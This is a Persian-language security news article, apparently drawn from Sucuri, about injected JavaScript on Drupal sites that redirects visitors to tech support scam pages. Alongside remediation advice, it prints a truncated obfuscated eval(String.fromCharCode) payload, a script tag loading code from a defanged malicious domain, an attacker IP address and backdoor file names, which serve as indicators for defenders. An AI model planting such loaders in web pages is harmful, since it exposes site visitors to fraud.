اخبار

آلودگی بزرگ localstorage[.]tk از طریق Drupal

پس از شناسایی برخی از آسیب‌پذیری‌های دروپال، اکنون خبرهایی از آلودگی‌های جدید در دروپال منتشر می‌شود. بیش از هزار وب سایت آلوده شناسایی شده است که کلاه‌بردارن با استفاده از این آسیب‌پذیری، کاربران را به صفحات فریب‌کاری Teach Support هدایت می‌کنند.

نحوه تزریق کد مخرب

صفحات آلوده حاوی کد جاوا اسکریپت زیر هستند که به فایل‌های .tpl.php، .html.twig و.js تزریق می‌شود.

 

eval (String .fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, ...skipped... 100, 40, 122, 41, 59));

 

اسکریپت از مسیر hxxps://js.localstorage[.]tk/s.js?crt=new تزریق می‌شود که وظیفه هدایت کاربر را برعهده دارد. این اسکریپت همچنین به مکان‌های مختلف در پایگاه داده در قالب متن ساده تزریق می‌شود.

 

<script type="text/javascript" src="hxxps://js.localstorage[.]tk/s.js?qr=888"></script>

 

نکته: کد اسکریپت از طریق آدرس زیر نیز می‌تواند تزریق شود.

 

hxxp://193.201.224 .233/m.js?d=3

 

نسخه های دیگری از این کد نیز در وب سایت های مبتنی بر WordPress نیز می تواند یافت شود.

 

آلودگی‌های مجدد

به دلیل اینکه هکرها نسخه‌های متعددی از فایل‌های مخرب را ایجاد می‌کنند تا در صورت حذف یکی از آنها، دیگری جایگزین شود؛ لذا حذف کدهای مخرب جاوا اسکریپت از فایل‌های آلوده و پایگاه داده به تنهایی کافی نیست. فایل‌های جایگزین اغلب دارای اسامی تصادفی مانند  “g.php”, “tonure.php“, “jooner.php“, “almio.php” هستند.

در کد زیر فایل‌های .tpl.php.html.twigheader.php,  drupal.js جستجو می‌شود و کد جاواسکریپت مخرب به آنها تزریق می‌شود.

 

 

همانطور که در خط‌های ۸ تا ۲۷ مشاهده می‌کنید، این کد تلاش می‌کند تا نرم‌افزارهای مخرب را به فایل‌هایی که از دایرکتوری جاری تا سه دایرکتوی  بالای پرونده فعلی (../../ ..) وجود دارد تزریق کند. این کار به این معنی است که کد مخرب ممکن است همه سایت‌های همسایه که حساب خود را با سایت هدف به اشتراک می‌گذارند آلوده کند.

 

برای جلوگیری از این تهدید، بروزرسانی و افزودن وصله‌های جدید دروپال در دستور کار قرار گیرد

 

اقدامات برای مقابله

در این قسمت برخی از اقدامات لازم برای مقابله با این تهدید ارائه می‌شود:

  • برای جلوگیری از این تهدید، بروزرسانی و افزودن وصله‌های جدید دروپال در دستور کار قرار گیرد.
  • پیدا کردن و حذف تمام درب‌های پشتی
  • حذف نرم‌افزارهای مخرب تزریق شده از فایل‌های آلوده و دروپال و پایگاه داده
  • و به طور کلی اگر اخبار مربوط به آسیب‌پذیری‌های کشف شده را دنبال نمی‌کنید، یا سایت خود را پس از انتشار وصله‌های جدید بروز نمی‌کنید، استفاده از یک فایروال وب سایت (WAF) که به طور فعال سایت‌ شما را در برابر تهدیدات محافظت می‌کند انتخاب مناسبی است.

 

منبع: وبلاگ Sucuri

آلودگی بزرگ localstorage[.]tk از طریق Drupal
To Top